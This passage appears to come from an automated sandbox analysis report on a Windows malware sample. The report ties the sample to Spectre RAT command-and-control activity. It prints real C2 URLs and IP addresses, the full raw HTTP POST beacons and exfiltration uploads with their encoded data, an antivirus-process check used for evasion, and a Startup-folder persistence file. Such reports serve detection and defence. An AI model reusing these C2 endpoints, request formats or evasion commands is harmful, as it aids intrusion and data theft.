"178.215.224.252/v10/ukyh.php?jspo=6", ProcessId: 5524, ProcessName: cmd.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" , ProcessId: 5592, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6004, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4440, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 1372, ProcessName: findstr.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T12:05:21.959147+010028537671Malware Command and Control Activity Detected192.168.2.549864178.215.224.7480TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T12:05:21.959147+010028537681A Network Trojan was detected192.168.2.549864178.215.224.7480TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=5Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?giAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=7Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=8Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6hAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.phpAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.NNAME=ConsoleShAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=60%Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6TAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3DAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6QAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=31Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=trueAvira URL Cloud: Label: malware
Source: http://178.215.224.252/v10/ukyhAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=7wk0Avira URL Cloud: Label: malware
Source: http://178.215.224.252/v10/ukyh.php?jspo=6Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?uvyw=2Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhlAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.%Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?uvyw=6Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6cAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3DAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmlAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.cAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.#Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, nircmdc.exe.52.dr
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,52_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_004107A0 FindFirstFileA,52_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_004062D5 FindFirstFileW,FindClose,88_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_00402E18 FindFirstFileW,88_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,88_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768032Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768032\Jump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2853767 - Severity 1 - ETPRO MALWARE Win32/Spectre RAT CnC Activity M1 : 192.168.2.5:49864 -> 178.215.224.74:80
Source: Network trafficSuricata IDS: 2853768 - Severity 1 - ETPRO MALWARE Win32/SpectreRAT CnC Activity M2 : 192.168.2.5:49864 -> 178.215.224.74:80
Source: Joe Sandbox ViewIP Address: 178.215.224.252 178.215.224.252
Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 639Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 46 75 62 6d 64 73 63 56 78 44 63 48 42 45 59 58 52 68 58 6c 70 74 59 57 31 70 62 47 56 63 52 47 31 73 63 47 68 72 62 6b 78 31 62 33 4a 7a 58 44 41 35 4d 44 49 79 52 54 41 79 4c 7a 42 44 4d 44 49 6c 4e 6a 55 78 4f 79 38 30 4f 30 49 37 57 55 4a 66 4d 7a 49 77 4b 44 6b 34 4d 6a 73 7a 4b 48 64 70 62 6d 52 76 64 33 45 6f 5a 6d 56 6d 5a 57 78 6d 5a 58 4a 5a 51 46 30 78 4d 6a 41 69 4d 54 49 79 4d 54 41 6f 4d 54 55 36 4c 44 49 7a 4e 79 77 79 4d 6a 51 73 4f 6a 63 79 57 30 68 66 4d 7a 67 77 4b 44 4d 79 4d 6a 4d 77 4b 6a 4d 25 32 46 4d 43 77 77 4d 54 63 75 4d 6a 49 30 4c 6a 63 32 55 30 4a 64 4d 54 41 79 4b 44 45 77 4d 6a 45 78 4b 6a 4d 33 4d 43 34 77 4d 7a 55 75 4d 44 49 32 4c 44 55 30 57 55 4a 66 4d 69 6f 79 4d 6a 30 6f 51 7a 70 55 56 33 46 74 63 6e 46 65 59 32 35 6b 62 57 35 78 56 45 6c 79 63 6b 52 6a 64 47 46 63 55 6d 39 68 62 32 46 73 5a 31 78 45 62 57 35 77 61 47 74 75 52 48 56 76 63 48 74 63 59 33 68 32 64 79 78 6c 65 6d 64 5a 51 46 38 7a 4d 6a 41 71 4d 54 49 34 4d 7a 45 71 4f 54 55 36 4a 6a 49 7a 4e 79 77 77 4d 44 59 75 4e 54 78 54 51 6c 38 79 4b 44 49 77 4e 53 70 44 4f 6c 35 64 63 57 56 79 63 31 35 6a 62 47 5a 74 62 6e 4e 63 51 33 42 34 52 47 4e 32 59 56 78 51 62 32 4e 76 61 32 35 6c 58 6b 5a 76 62 48 42 71 59 57 78 45 64 57 56 79 63 56 52 34 61 6e 56 7a 4c 48 68 72 63 46 6c 49 56 54 4d 79 4d 43 67 78 4d 44 45 79 4d 79 70 42 4d 6c 35 56 63 32 56 77 63 56 78 68 62 6d 5a 76 62 6e 46 63 53 58 42 79 52 6d 46 30 59 31 78 51 62 57 4e 74 61 32 78 6c 58 45 52 76 62 6e 68 71 61 57 35 4d 64 32 39 34 63 31 35 36 61 6e 56 7a 4c 48 70 72 65 46 4e 43 58 7a 45 79 4d 43 6f 78 4d 44 41 78 4d 79 49 7a 4e 7a 67 75 4d 44 4d 31 4c 6a 41 79 4e 43 34 31 4e 46 4e 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmFubmdscVxDcHBEYXRhXlptYW1pbGVcRG1scGhrbkx1b3JzXDA5MDIyRTAyLzBDMDIlNjUxOy80O0I7WUJfMzIwKDk4MjszKHdpbmRvd3EoZmVmZWxmZXJZQF0xMjAiMTIyMTAoMTU6LDIzNywyMjQsOjcyW0hfMzgwKDMyMjMwKjM%2FMCwwMTcuMjI0Ljc2U0JdMTAyKDEwMjExKjM3MC4wMzUuMDI2LDU0WUJfMioyMj0oQzpUV3FtcnFeY25kbW5xVElyckRjdGFcUm9hb2FsZ1xEbW5waGtuRHVvcHtcY3h2dyxlemdZQF8zMjAqMTI4MzEqOTU6JjIzNywwMDYuNTxTQl8yKDIwNSpDOl5dcWVyc15jbGZtbnNcQ3B4RGN2YVxQb2Nva25lXkZvbHBqYWxEdWVycVR4anVzLHhrcFlIVTMyMCgxMDEyMypBMl5Vc2VwcVxhbmZvbnFcSXByRmF0Y1xQbWNta2xlXERvbnhqaW5Md294c156anVzLHpreFNCXzEyMCoxMDAxMyIzNzguMDM1LjAyNC41NFNAXw%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 247Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 34 33 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 74 4d 44 35 5a 51 46 31 4c 52 6c 6c 49 58 54 6f 73 4e 6a 51 73 4d 7a 49 78 4a 6a 38 33 57 55 42 66 4d 54 41 75 4d 44 45 33 4d 6a 67 79 57 30 42 64 51 54 68 63 56 58 46 6c 63 6e 4e 65 59 57 52 6d 62 57 78 7a 58 45 4e 77 63 6b 5a 6a 64 47 4e 65 54 6d 39 6a 59 57 35 55 56 6d 56 74 65 46 34 31 50 6a 67 79 4d 54 42 65 52 47 74 75 61 33 74 67 4c 47 46 76 62 31 74 41 58 55 4d 36 58 46 64 37 5a 33 4a 7a 58 47 4e 75 5a 6d 39 73 63 31 78 42 63 6e 42 4d 59 58 5a 6a 58 45 78 74 59 32 4e 75 58 6c 52 6e 62 33 4a 63 4e 7a 59 36 4f 44 45 79 58 45 35 72 62 47 46 7a 61 69 78 68 62 57 38 25 33 44 Data Ascii: jspo=43&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAtMD5ZQF1LRllIXTosNjQsMzIxJj83WUBfMTAuMDE3MjgyW0BdQThcVXFlcnNeYWRmbWxzXENwckZjdGNeTm9jYW5UVmVteF41PjgyMTBeRGtua3tgLGFvb1tAXUM6XFd7Z3JzXGNuZm9sc1xBcnBMYXZjXExtY2NuXlRnb3JcNzY6ODEyXE5rbGFzaixhbW8%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 521Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 30 6f 57 30 42 56 4d 7a 49 34 4b 6a 4d 79 4d 6a 4d 7a 4b 44 45 31 4d 43 59 77 4d 7a 55 73 4d 6a 49 30 4c 6a 63 30 57 55 68 66 4d 54 41 7a 4b 44 4d 77 4d 6a 49 31 4b 6c 4a 6e 64 6d 31 75 64 32 64 45 5a 58 52 70 59 57 64 78 4c 6d 64 36 5a 31 74 41 58 54 4d 34 4d 69 6f 78 4f 44 49 7a 4f 53 6f 7a 4e 54 6f 73 4d 44 4d 31 4c 44 6f 36 4e 69 77 33 4e 6c 74 41 58 54 49 71 4d 6a 49 39 4b 45 4d 36 58 46 64 78 5a 58 4a 78 58 47 46 73 5a 47 39 6d 63 31 35 44 63 48 42 47 59 58 5a 6a 58 6b 78 74 59 57 4e 73 58 48 52 6e 5a 58 4a 63 55 6d 31 30 5a 32 5a 31 5a 30 5a 6e 64 47 74 68 5a 58 45 6d 62 58 70 6e 57 30 4a 64 4f 43 6f 78 4d 44 4d 6f 53 7a 68 63 56 58 4e 6e 63 48 4e 63 59 32 78 6d 62 32 78 7a 56 45 46 79 63 6b 52 68 64 6d 46 65 54 6d 31 6a 59 32 35 65 64 47 56 74 63 6c 52 51 5a 58 5a 74 62 48 64 74 52 47 64 30 61 32 46 6e 63 53 35 6e 63 47 31 5a 51 6c 30 7a 4d 44 41 71 4e 69 70 62 51 6c 55 7a 4d 44 41 71 4d 7a 49 77 4d 54 4d 71 4d 54 63 36 4c 6a 6f 78 4e 79 77 79 4d 6a 59 75 4e 54 5a 5a 51 46 38 7a 4d 6a 41 71 4d 54 49 34 4d 7a 4d 71 4f 54 64 5a 53 46 30 7a 4d 6a 49 6f 4d 7a 49 77 4d 7a 6b 69 4d 7a 55 34 4c 44 49 78 4e 53 34 79 4d 6a 59 6d 4e 54 52 62 51 46 38 7a 4d 44 4d 6f 4d 54 41 79 4d 6a 49 69 55 6d 64 30 5a 57 35 33 5a 55 5a 6e 64 47 6c 68 5a 33 45 75 5a 58 68 6e 55 30 4a 64 4d 54 67 79 4b 44 6b 77 4d 6a 4d 7a 4b 44 4d 31 4f 43 77 36 4f 54 63 73 4d 6a 41 30 4c 6a 63 30 57 30 42 66 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKD0oW0BVMzI4KjMyMjMzKDE1MCYwMzUsMjI0Ljc0WUhfMTAzKDMwMjI1KlJndm1ud2dEZXRpYWdxLmd6Z1tAXTM4MioxODIzOSozNTosMDM1LDo6Niw3NltAXTIqMjI9KEM6XFdxZXJxXGFsZG9mc15DcHBGYXZjXkxtYWNsXHRnZXJcUm10Z2Z1Z0ZndGthZXEmbXpnW0JdOCoxMDMoSzhcVXNncHNcY2xmb2xzVEFyckRhdmFeTm1jY25edGVtclRQZXZtbHdtRGd0a2FncS5ncG1ZQl0zMDAqNipbQlUzMDAqMzIwMTMqMTc6LjoxNywyMjYuNTZZQF8zMjAqMTI4MzMqOTdZSF0zMjIoMzIwMzkiMzU4LDIxNS4yMjYmNTRbQF8zMDMoMTAyMjIiUmd0ZW53ZUZndGlhZ3EuZXhnU0JdMTgyKDkwMjMzKDM1OCw6OTcsMjA0Ljc0W0Bf
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 434Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 39 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 59 57 78 6d 62 57 5a 78 57 30 42 56 54 56 45 6f 54 6d 4e 76 5a 7a 67 69 49 69 41 69 4b 43 67 69 49 69 41 69 49 43 41 67 49 43 41 67 49 69 67 69 54 57 6c 6a 63 47 31 7a 62 32 52 30 49 46 64 72 62 6d 78 76 64 58 45 67 4d 54 49 67 55 6e 42 74 57 30 4a 66 4d 7a 41 75 4d 44 4d 25 32 46 4d 6a 41 77 55 30 4a 66 4f 44 59 30 4e 44 63 30 57 55 4a 64 51 54 4a 55 56 33 46 6c 63 48 4e 63 59 57 78 6d 62 32 78 37 58 6b 46 77 63 45 5a 6a 64 47 46 65 54 47 39 6a 59 32 78 55 56 47 64 76 63 46 77 31 4e 6a 6f 79 4d 54 4a 65 52 47 74 75 61 58 4e 71 4a 6d 46 76 62 56 4e 43 58 30 73 36 58 6c 64 78 5a 33 42 78 58 47 4e 6b 62 6d 31 73 63 31 35 42 63 48 42 45 59 58 52 6a 56 45 35 76 59 32 46 75 58 6c 52 6c 62 33 42 63 4e 7a 51 34 4f 44 4d 77 58 6b 5a 70 62 47 6c 78 61 69 78 6a 62 57 39 5a 51 46 30 78 4d 69 55 77 4e 6c 74 49 58 30 46 4d 57 30 4a 66 64 6e 42 33 5a 31 74 43 56 57 35 6a 62 6e 4e 6e 57 30 42 64 4f 43 34 30 4e 43 59 7a 4d 6a 4d 75 4e 54 64 62 51 46 39 62 51 46 31 42 4f 6c 52 56 63 57 64 79 63 31 35 68 62 6d 52 74 62 6e 46 65 51 33 42 77 52 47 4e 38 59 31 78 53 5a 32 4e 76 59 57 35 6c 58 6b 5a 74 62 6e 4a 6f 61 32 5a 4d 64 32 39 77 63 51 25 33 44 25 33 44 Data Ascii: jspo=9&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=YWxmbWZxW0BVTVEoTmNvZzgiIiAiKCgiIiAiICAgICAgIigiTWljcG1zb2R0IFdrbmxvdXEgMTIgUnBtW0JfMzAuMDM%2FMjAwU0JfODY0NDc0WUJdQTJUV3FlcHNcYWxmb2x7XkFwcEZjdGFeTG9jY2xUVGdvcFw1NjoyMTJeRGtuaXNqJmFvbVNCX0s6XldxZ3BxXGNkbm1sc15BcHBEYXRjVE5vY2FuXlRlb3BcNzQ4ODMwXkZpbGlxaixjbW9ZQF0xMiUwNltIX0FMW0JfdnB3Z1tCVW5jbnNnW0BdOC40NCYzMjMuNTdbQF9bQF1BOlRVcWdyc15hbmRtbnFeQ3BwRGN8Y1xSZ2NvYW5lXkZtbnJoa2ZMd29wcQ%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 331Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 44 45 34 4b 44 4d 25 32 46 4f 43 77 77 4d 7a 63 73 4d 44 49 32 4a 6a 6f 33 4d 46 74 43 58 54 45 77 4d 43 6f 78 4d 6a 67 7a 4d 69 6f 78 4e 54 6f 75 4d 6a 4d 31 4c 6a 49 77 4e 43 59 33 4e 6c 6c 41 58 54 4d 77 4d 69 67 7a 4d 44 49 7a 4d 79 6f 78 4e 7a 6f 6d 4d 44 45 31 4a 6a 41 77 50 43 34 31 4e 6c 6c 43 58 7a 41 71 4d 44 67 39 4b 45 45 36 58 6c 56 7a 5a 58 4a 7a 58 47 4e 6b 5a 47 39 75 63 31 35 44 63 48 42 47 59 58 52 68 58 6c 4a 6e 59 57 39 72 62 6d 64 65 52 47 31 75 63 6d 68 72 62 45 5a 31 62 58 42 78 56 48 4e 35 64 58 67 73 65 47 46 77 57 55 4a 66 4d 7a 49 79 4b 6a 4d 34 4f 54 41 78 4b 6b 45 36 58 46 56 7a 5a 58 4a 78 56 47 4e 73 5a 6d 39 73 63 56 78 42 63 6e 42 45 59 58 5a 68 56 46 4a 74 59 32 31 70 62 47 64 65 52 6d 31 73 63 6d 70 72 62 6b 52 31 62 33 68 78 58 48 46 78 64 33 49 6d 65 6d 74 79 57 55 4a 66 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMDE4KDM%2FOCwwMzcsMDI2Jjo3MFtCXTEwMCoxMjgzMioxNTouMjM1LjIwNCY3NllAXTMwMigzMDIzMyoxNzomMDE1JjAwPC41NllCXzAqMDg9KEE6XlVzZXJzXGNkZG9uc15DcHBGYXRhXlJnYW9rbmdeRG1ucmhrbEZ1bXBxVHN5dXgseGFwWUJfMzIyKjM4OTAxKkE6XFVzZXJxVGNsZm9scVxBcnBEYXZhVFJtY21pbGdeRm1scmprbkR1b3hxXHFxd3ImemtyWUJf
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 833Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 1701Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 131Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 7a 4d 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51 33 42 79 52 47 46 30 59 56 78 53 62 57 6c 76 61 57 35 6e 58 6b 39 76 65 6d 74 73 62 47 46 65 52 6d 46 79 5a 32 52 76 65 46 35 62 51 6c 38 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDkzMCpLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxSbWlvaW5nXk9vemtsbGFeRmFyZ2RveF5bQl8%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php?uvyw=6 HTTP/1.1Content-Type: multipart/form-data; boundary=----974767299852498929531610575User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 29950Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php?uvyw=2 HTTP/1.1Content-Type: multipart/form-data; boundary=----974767299852498929531610575User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 699317Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 367Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 79 4d 69 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51 33 42 79 52 47 46 30 59 56 78 53 62 57 6c 76 61 57 35 6e 58 6b 5a 76 62 48 4a 6f 61 57 35 47 64 57 56 77 63 56 34 30 51 30 4d 35 4e 44 51 78 4d 54 64 42 51 55 4d 33 4d 45 51 38 51 45 56 47 4f 45 52 48 4f 7a 49 77 52 30 5a 48 4e 6a 52 66 5a 47 34 6d 4e 58 68 62 51 6c 30 78 4d 44 41 71 4d 54 49 34 4d 7a 45 71 4d 54 55 36 4c 6a 49 7a 4e 53 34 79 4d 44 51 6d 4e 7a 5a 5a 51 46 30 7a 4d 6a 41 6f 4d 7a 41 77 4b 45 45 36 58 46 56 78 62 58 42 7a 58 47 6c 75 5a 47 64 75 63 56 35 44 63 6e 4a 47 59 58 5a 70 56 46 42 74 59 57 39 70 62 6d 64 63 52 47 39 75 65 47 70 70 62 6b 52 33 62 33 42 7a 58 6a 52 44 51 54 73 32 50 6a 4d 7a 4e 30 4e 44 51 54 63 79 52 44 5a 43 52 30 51 79 52 6b 55 7a 4d 44 70 48 52 45 55 38 4e 43 78 34 62 6d 56 5a 51 6c 38 7a 4d 6a 41 6f 4f 54 67 79 4d 7a 45 6f 4d 54 63 34 4c 6a 49 78 4e 79 59 77 4d 6a 51 75 4e 54 5a 62 51 46 38 25 33 44 Data Ascii: 